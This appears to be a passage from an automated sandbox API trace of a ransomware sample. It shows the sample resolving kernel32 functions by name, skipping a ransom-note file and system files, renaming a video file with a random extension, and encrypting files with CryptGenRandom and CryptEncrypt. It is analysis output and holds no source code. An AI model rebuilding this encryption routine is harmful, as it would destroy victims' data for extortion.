| out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0087.256] lstrlenA (lpString="CTRLROUTINE") returned 11 [0087.256] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0087.256] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0087.256] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0087.256] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0087.256] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0087.256] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0087.256] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0087.256] lstrlenA (lpString="DEBUGBREAK") returned 10 [0087.256] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0087.256] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0087.256] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0087.256] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0087.256] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0087.256] lstrlenA (lpString="DECODEPOINTER") returned 13 [0087.256] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0087.256] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0087.256] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0087.256] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0087.256] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0087.256] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0087.256] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0087.256] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0087.256] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0087.256] lstrlenA (lpString="DELETEATOM") returned 10 [0087.256] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0087.256] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0087.256] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0087.256] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0087.256] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0087.256] lstrlenA (lpString="DELETEFIBER") returned 11 [0087.257] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0087.257] lstrlenA (lpString="DELETEFILEA") returned 11 [0087.257] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0087.257] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0087.257] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0087.257] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0087.257] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0087.257] lstrlenA (lpString="DELETEFILEW") returned 11 [0087.257] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0087.257] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0087.257] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0087.257] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0087.257] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0087.257] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0087.257] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0087.257] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0087.257] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0087.257] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0087.257] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0087.257] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0087.257] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0087.257] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0087.257] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0087.257] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0087.257] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0087.257] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0087.257] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0087.257] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0087.257] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0087.257] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0087.257] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0087.257] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0087.257] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0087.257] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0087.257] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0087.257] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0087.257] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0087.257] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0087.258] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0087.258] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0087.258] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0087.258] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0087.258] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0087.258] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0087.258] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0087.258] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0087.258] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0087.258] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0087.258] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0087.258] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0087.258] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0087.258] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0087.258] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0087.258] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0087.258] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0087.258] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0087.258] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0087.258] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0087.258] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0087.258] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0087.258] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0087.258] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0087.258] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0087.258] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0087.258] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0087.258] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0087.258] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0087.258] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0087.258] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0087.258] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0087.258] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0087.258] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0087.258] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0087.258] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0087.258] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0087.259] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0087.259] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\0xbWCInM_ATbmV-Z.mp4") returned 74 [0087.259] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\0xbWCInM_ATbmV-Z.mp4.hloEEL") returned 81 [0087.259] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\0xbWCInM_ATbmV-Z.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\0xbwcinm_atbmv-z.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\0xbWCInM_ATbmV-Z.mp4.hloEEL" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\0xbwcinm_atbmv-z.mp4.hloeel"), dwFlags=0x0) returned 1 [0087.260] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.260] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.260] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.260] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca1d24f0, ftCreationTime.dwHighDateTime=0x1d4c5e4, ftLastAccessTime.dwLowDateTime=0xda7c70b0, ftLastAccessTime.dwHighDateTime=0x1d4c5c3, ftLastWriteTime.dwLowDateTime=0xda7c70b0, ftLastWriteTime.dwHighDateTime=0x1d4c5c3, nFileSizeHigh=0x0, nFileSizeLow=0xdb4e, dwReserved0=0x0, dwReserved1=0x0, cFileName="60wQ6b0LwaRhMx.flv", cAlternateFileName="60WQ6B~1.FLV")) returned 1 [0087.260] lstrcmpiW (lpString1="60wQ6b0LwaRhMx.flv", lpString2="DECRYPT-FILES.txt") returned -1 [0087.260] lstrcmpiW (lpString1="60wQ6b0LwaRhMx.flv", lpString2="autorun.inf") returned -1 [0087.260] lstrcmpiW (lpString1="60wQ6b0LwaRhMx.flv", lpString2="boot.ini") returned -1 [0087.260] lstrcmpiW (lpString1="60wQ6b0LwaRhMx.flv", lpString2="desktop.ini") returned -1 [0087.260] lstrcmpiW (lpString1="60wQ6b0LwaRhMx.flv", lpString2="ntuser.dat") returned -1 [0087.261] lstrcmpiW (lpString1="60wQ6b0LwaRhMx.flv", lpString2="iconcache.db") returned -1 [0087.261] lstrcmpiW (lpString1="60wQ6b0LwaRhMx.flv", lpString2="bootsect.bak") returned -1 [0087.261] lstrcmpiW (lpString1="60wQ6b0LwaRhMx.flv", lpString2="ntuser.dat.log") returned -1 [0087.261] lstrcmpiW (lpString1="60wQ6b0LwaRhMx.flv", lpString2="thumbs.db") returned -1 [0087.261] lstrcmpiW (lpString1="60wQ6b0LwaRhMx.flv", lpString2="Bootfont.bin") returned -1 [0087.261] lstrlenW (lpString="60wQ6b0LwaRhMx.flv") returned 18 [0087.261] lstrcmpiW (lpString1="flv", lpString2="lnk") returned -1 [0087.261] lstrcmpiW (lpString1="flv", lpString2="exe") returned 1 [0087.261] lstrcmpiW (lpString1="flv", lpString2="sys") returned -1 [0087.261] lstrcmpiW (lpString1="flv", lpString2="dll") returned 1 [0087.261] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned 54 [0087.261] lstrlenW (lpString="60wQ6b0LwaRhMx.flv") returned 18 [0087.261] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" [0087.261] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\", lpString2="60wQ6b0LwaRhMx.flv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\60wQ6b0LwaRhMx.flv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\60wQ6b0LwaRhMx.flv" [0087.261] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.261] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\60wQ6b0LwaRhMx.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ne-e0bic1cg5irwk\\60wq6b0lwarhmx.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0087.261] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=56142) returned 1 [0087.261] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0087.261] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0087.262] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0087.262] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0087.262] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0087.262] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0087.262] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0087.263] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.263] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0087.264] CloseHandle (hObject=0x42c) returned 1 [0087.264] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.264] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0087.266] CloseHandle (hObject=0x0) returned 0 [0087.266] CloseHandle (hObject=0x428) returned 1 [0087.266] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.266] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.266] GetTickCount () returned 0x114e438 [0087.266] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.266] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0087.267] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0087.267] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0087.267] lstrlenA (lpString="kernel32.dll") returned 12 [0087.267] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0087.267] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0087.267] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0087.267] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0087.267] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0087.267] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0087.267] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0087.267] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0087.267] lstrlenA (lpString="ADDATOMA") returned 8 [0087.267] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0087.267] lstrlenA (lpString="ADDATOMW") returned 8 [0087.267] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0087.267] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0087.267] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0087.268] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0087.268] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0087.268] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0087.268] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0087.268] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0087.268] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0087.268] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0087.268] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0087.268] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0087.268] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0087.268] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0087.268] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0087.268] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0087.268] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0087.268] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0087.268] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0087.268] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0087.268] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0087.268] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0087.268] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0087.268] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0087.268] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0087.268] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0087.268] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0087.268] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0087.268] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0087.268] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0087.268] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0087.268] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0087.268] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0087.268] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0087.268] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0087.268] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0087.268] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0087.268] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0087.268] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0087.269] lstrlenA (lpString="BACKUPREAD") returned 10 [0087.269] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0087.269] lstrlenA (lpString="BACKUPSEEK") returned 10 [0087.269] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0087.269] lstrlenA (lpString="BACKUPWRITE") returned 11 [0087.269] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0087.269] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0087.269] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0087.269] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0087.269] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0087.269] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0087.269] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0087.269] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0087.269] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0087.269] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0087.269] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0087.269] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0087.269] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" 